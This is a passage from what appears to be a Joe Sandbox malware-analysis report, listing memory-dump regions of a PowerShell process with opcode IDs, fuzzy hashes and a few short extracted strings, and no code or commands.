                                                                                                        • String ID: kT|h
                                                                                                        • API String ID: 0-1714812642
                                                                                                        • Opcode ID: 16ad20e39b5c0464bf7a4ed41c2c1569cf9ae69b5199c914fe755cf2f55da42a
                                                                                                        • Instruction ID: 501c40ce484d330f2ced178a05a0b3fc520f343452583e0724be0283e8861c59
                                                                                                        • Opcode Fuzzy Hash: 16ad20e39b5c0464bf7a4ed41c2c1569cf9ae69b5199c914fe755cf2f55da42a
                                                                                                        • Instruction Fuzzy Hash: 8D41F37140DFC48FE7568B28D8459527FF0EF56321B1501DFE088CB1A3D629E84AC7A2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1420530458.00007FFAAC6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac6b0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 999db1cb945f6397e61eb1316a1215e7e0d9db325340c977efbf189de386437f
                                                                                                        • Instruction ID: ba6d6d1a3e6100f2aeff0e806b2fca54d93e641464c313e0cd407941761e4daf
                                                                                                        • Opcode Fuzzy Hash: 999db1cb945f6397e61eb1316a1215e7e0d9db325340c977efbf189de386437f
                                                                                                        • Instruction Fuzzy Hash: B2022662A4EA898FE796DB289C556B57BE1EF47210B0851FBD04DC7193DE18EC0AC3C1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1416757497.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac460000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ee4eadc2df954115228f0e424ea15f566bb093db6d1f6c7c69b692c07a8733ea
                                                                                                        • Instruction ID: ed9804821d0db80f202e4410fe1ce4488ec500085ad7b4f56dfe0fb8d5707d2b
                                                                                                        • Opcode Fuzzy Hash: ee4eadc2df954115228f0e424ea15f566bb093db6d1f6c7c69b692c07a8733ea
                                                                                                        • Instruction Fuzzy Hash: 9D712B7290EBC58FE7168B685C1A5A97FE0EB57314F0841FFD08C97293EA14A80D87D6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1416757497.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac460000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b590b67572e9ba456ff61956ad273512fd3fe30f1cfca5e0d15cbc44ad561fd3
                                                                                                        • Instruction ID: 27f98eb2b05fb7e11db2c67cac390201bf815804ab498a5fe88238e0b28d1158
                                                                                                        • Opcode Fuzzy Hash: b590b67572e9ba456ff61956ad273512fd3fe30f1cfca5e0d15cbc44ad561fd3
                                                                                                        • Instruction Fuzzy Hash: C0513D7290EBC48FE719DB5C9C4A2A87FE0EB56314F0441BFD08CC7253DA20A81987C6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1420530458.00007FFAAC6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac6b0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d6f1087199803ba14368851c8ef53bd918f956806adf6d6cbb4d4ffcfdf97b57
                                                                                                        • Instruction ID: 9ddfe0491c66fb6d778c9f327e6b426e750d644906aa1732f91048e607480a5a
                                                                                                        • Opcode Fuzzy Hash: d6f1087199803ba14368851c8ef53bd918f956806adf6d6cbb4d4ffcfdf97b57
                                                                                                        • Instruction Fuzzy Hash: 3D41E772B4EE858FF7A6D72C98159B47BD1EF46220B1861BAD14EC7193ED24EC0983C1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1420530458.00007FFAAC6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac6b0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 240f7d032411f34c3fcb15efd9a109182108354359fe66741a5bd57ffb3f724b
                                                                                                        • Instruction ID: ee20cafbae2d9c5281ab423195afc174ddb38c4ab5a5d2b4805473d6da6f08b3
                                                                                                        • Opcode Fuzzy Hash: 240f7d032411f34c3fcb15efd9a109182108354359fe66741a5bd57ffb3f724b
                                                                                                        • Instruction Fuzzy Hash: 5D316672E9FA4A8FF3A6D718985557877C1EF46300B58A1BAD40EC7197CD28EC0982C5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1416757497.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac460000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8c8d2ba93fc3fcd1df08b07e1607ce4df7b9b0563087c090dcab24540ab12e4c
                                                                                                        • Instruction ID: d08d61800c93b3384c7fc6442b0b956f3672d7c41c040be8debedee2afe1025e
                                                                                                        • Opcode Fuzzy Hash: 8c8d2ba93fc3fcd1df08b07e1607ce4df7b9b0563087c090dcab24540ab12e4c
                                                                                                        • Instruction Fuzzy Hash: B821F97090C64C8FEB58DFACD84A7E97BE0EB56321F04826BD04DC3156DA74A45ACB91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1416757497.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac460000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3aa77cd86a15547bb94eba049f798f9760b94c6ed4efe443efbe728cf463538e
                                                                                                        • Instruction ID: 7dcea91db58e744f4e00d89fa7a6d2e07978c77b16611ef68be1add0e280874b
                                                                                                        • Opcode Fuzzy Hash: 3aa77cd86a15547bb94eba049f798f9760b94c6ed4efe443efbe728cf463538e
                                                                                                        • Instruction Fuzzy Hash: 07313E3081965ECFFBB59F14CC49BF93294FF42318F808539D80DC6092DA78AA99CA95
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1420530458.00007FFAAC6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac6b0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6c347cc9b6c4eb282d6168152b3fb74b5e08fc502cab271578fb0e5afca3e0e1
                                                                                                        • Instruction ID: 5277b5ca7d38ac65c24baa015c872807d247bd663d7a3b02e5aace761139d061
                                                                                                        • Opcode Fuzzy Hash: 6c347cc9b6c4eb282d6168152b3fb74b5e08fc502cab271578fb0e5afca3e0e1
                                                                                                        • Instruction Fuzzy Hash: A8110672E4EA458FF7A6DB1C98545743BD1EF4231075960BAD14EC7597DD28EC088381
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1416757497.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac460000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2f8298dd09f3312d1a5908c48fc3bdeb0cd7735db16cd710cb60a4918d3f89ac
                                                                                                        • Instruction ID: 774c4762d5cfc9e1e8e03a928b3a70030af2fc91e70fd7379721600ef32e6e6e
                                                                                                        • Opcode Fuzzy Hash: 2f8298dd09f3312d1a5908c48fc3bdeb0cd7735db16cd710cb60a4918d3f89ac
                                                                                                        • Instruction Fuzzy Hash: 8701677111CB0C8FDB44EF0CE451AA9B7E0FB95364F10056EE58AC3665D636E881CB45
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1416757497.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac460000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1acf97f916c20f77b6fcbfd16c29db79f9add618bedaa1ee4e2927ee71558793
                                                                                                        • Instruction ID: 0c4c65ccd6e70323f11d72cea30ea485b1e10a9db1c4acd27a580f1f861a6474
                                                                                                        • Opcode Fuzzy Hash: 1acf97f916c20f77b6fcbfd16c29db79f9add618bedaa1ee4e2927ee71558793
                                                                                                        • Instruction Fuzzy Hash: 5DF02B70808689CFEB15DF24981A4D57FA0FF26211B04039BE45CC70A2DB64D458CBC2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1416757497.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac460000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: XN_^
                                                                                                        • API String ID: 0-3825821171
                                                                                                        • Opcode ID: 07e2f854e92e14781dcfe01d777fef2883828a33b3067f978f7913ceed1dac23
                                                                                                        • Instruction ID: 72fd18d0b872f5af930fd8c18b98e5ed4b3a7b385c271bb5e8a2400abc97295a
                                                                                                        • Opcode Fuzzy Hash: 07e2f854e92e14781dcfe01d777fef2883828a33b3067f978f7913ceed1dac23
                                                                                                        • Instruction Fuzzy Hash: 0A222853A8D6A247F35177BCF8199FDAB90DF82335708C277E18DCA29F4804A48A87D5